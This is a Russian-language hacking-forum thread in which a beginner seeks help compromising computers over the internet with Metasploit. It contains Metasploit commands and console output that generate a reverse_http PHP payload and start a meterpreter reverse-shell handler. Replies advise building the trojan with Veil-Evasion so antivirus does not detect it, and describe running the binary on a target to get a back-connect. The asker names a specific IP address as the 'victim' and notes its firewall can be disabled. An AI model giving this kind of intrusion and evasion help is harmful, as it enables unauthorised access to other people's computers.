Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Вопрос по Exploit (https://forum.antichat.xyz/showthread.php?t=435729)

Sega 13.01.2016 12:09
Прошу не судить строга и не кидать камни, только учусь!


Недавно познакомился с metasploit и с Exploit.

exploit/windows/smb/ms08_067_netapi для Windows XP хорошо подходит.

Больший интерес привлекexploit/multi/handler т.к он позволяет проникнуть через троян по определенному порту в локальной сети.

Что требуется и в чем вопрос?!

Хочу найти подобный эксплойт этому который функционирует в ИНТЕРНЕТ сети.

Какой эксплойт лучше использовать для таких нужд ?

Где копать информацию по нужному exploit?

Код:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ***.***.*.*
set LPORT ****
exploit
Буду очень благодарен за информацию по данной теме!

Знания по metasploit, armitage, cobalt strike в стадии зародыша.

YaBtr 13.01.2016 13:11
Цитата:
Сообщение от Sega
Sega said:

Прошу не судить строга и не кидать камни, только учусь!

Недавно познакомился с metasploit и с Exploit.
exploit/windows/smb/ms08_067_netapi для Windows XP хорошо подходит.
Больший интерес привлекexploit/multi/handler т.к он позволяет проникнуть через троян по определенному порту в локальной сети
.
Что требуется и в чем вопрос?!
Хочу найти подобный эксплойт этому который функционирует в ИНТЕРНЕТ сети.

Какой эксплойт лучше использовать для таких нужд ?

Где копать информацию по нужному exploit?
Код:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ***.***.*.*
set LPORT ****
exploit
Буду очень благодарен за информацию по данной теме!
Знания по metasploit, armitage, cobalt strike в стадии зародыша.
Генерируете нагрузку, например, таким образом:

Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:

Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.

Sega 13.01.2016 14:15
Цитата:
Сообщение от YaBtr
YaBtr said:

Генерируете нагрузку, например, таким образом:
Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:
Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.
Код:
Code:
msf exploit(handler) > use exploit/multi/handlerInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf payload(reverse_http) > set LPORT 4444
LPORT => 4444
msf payload(reverse_http) > generate -f ololo.php -t raw[*] Writing 324 bytes to ololo.php...
msf payload(reverse_http) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.28:4444[*] Starting the payload handler...
???

Всё тоже самое нужно повторить с атакой на компьютер в другой сети.

Как понимаю для этого используется другой Еxploit.

Наведите на путь истинный.

YaBtr 13.01.2016 15:14
Если Вам нужна php-нагрузка для всех ресурсов, то генерируете ее один раз и настраиваете хэндлер на мультиприем.

st1x0 15.01.2016 02:04
Можно поступить по другому, т.к. создание троя в metasploit палится вирями. Он лучше подойдёт для ловли shell, а создание бэкдора сделай в veil-evasion и не палится и хороший выбор языков

Sega 24.01.2016 05:45
veil-evasion

Цитата:
Сообщение от st1x0
st1x0 said:

Можно поступить по другому, т.к. создание троя в metasploit палится вирями. Он лучше подойдёт для ловли shell, а создание бэкдора сделай в veil-evasion и не палится и хороший выбор языков
veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве.

blackbox 24.01.2016 11:17
Цитата:
Сообщение от Sega
Sega said:

veil-evasion
veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве.
Разницы особо нету, только в интернете машины чаще за натом или фаерволом, а системы и баги те же.

Sega 25.01.2016 01:09
Цитата:
Сообщение от Sega
Sega said:

veil-evasion
veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве.
Цитата:
Сообщение от blackbox
blackbox said:

Разницы особо нету, только в интернете машины чаще за натом или фаерволом, а системы и баги те же.
Как Вам по подробней описать ситуацию?! Приставим ситуацию!!!

Есть человек с ip адресом: 145.255.181.238 я могу передать этом человеку файл) сделанный с помощью veil-evasion.

Какой exploit лучше использовать и как? Как это примерно выглядит? Что прописывать в show options? Как лучше с компелировать файл через veil-evasion? Очень интересно увидеть процесс запуска эксплойта! Я понимаю это звучит очень глупо.

На компьютере жертвы нет хорошего фаервола и есть возможность его отключить.

blackbox 25.01.2016 01:24
Цитата:
Сообщение от Sega
Sega said:

Как Вам по подробней описать ситуацию?! Приставим ситуацию!!!
Есть человек с ip адресом: 145.255.181.238 я могу передать этом человеку файл) сделанный с помощью veil-evasion.
Какой exploit лучше использовать и как? Как это примерно выглядит? Что прописывать в show options? Как лучше с компелировать файл через veil-evasion? Очень интересно увидеть процесс запуска эксплойта! Я понимаю это звучит очень глупо.
На компьютере жертвы нет хорошего фаервола и есть возможность его отключить.
Я не юзал veil, поэтому посоветовать конкретного ничего не могу. Можно помощь почитать https://github.com/Veil-Framework/Veil-Evasion или видосы посмотреть. Ну я думаю принцип примерно одинаковый - запустить у себя на прослушивание meterpreter а бинарник, зашифрованный вейлом запустить на целевом компьютере и ждать пока произойдет бек-коннект, ну или что там нагрузка должна делать. В ютубе ролики, по идее должны быть. Посмотрите, поинтересуйтесь, я думаю все не так сложно но и с пол-пинка тоже не получится. Успехов!

Sega 25.01.2016 01:30
Цитата:
Сообщение от blackbox
blackbox said:

Я не юзал veil, поэтому посоветовать конкретного ничего не могу. Можно помощь почитать
https://github.com/Veil-Framework/Veil-Evasion
или видосы посмотреть. Ну я думаю принцип примерно одинаковый - запустить у себя на прослушивание meterpreter а бинарник, зашифрованный вейлом запустить на целевом компьютере и ждать пока произойдет бек-коннект, ну или что там нагрузка должна делать. В ютубе ролики, по идее должны быть. Посмотрите, поинтересуйтесь, я думаю все не так сложно но и с пол-пинка тоже не получится. Успехов!
Спасибо вам огромное за трату времени. Вот подкинули бы вы еще материала чтоб почитать и посмотреть по этой теме!


Время: 09:13
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице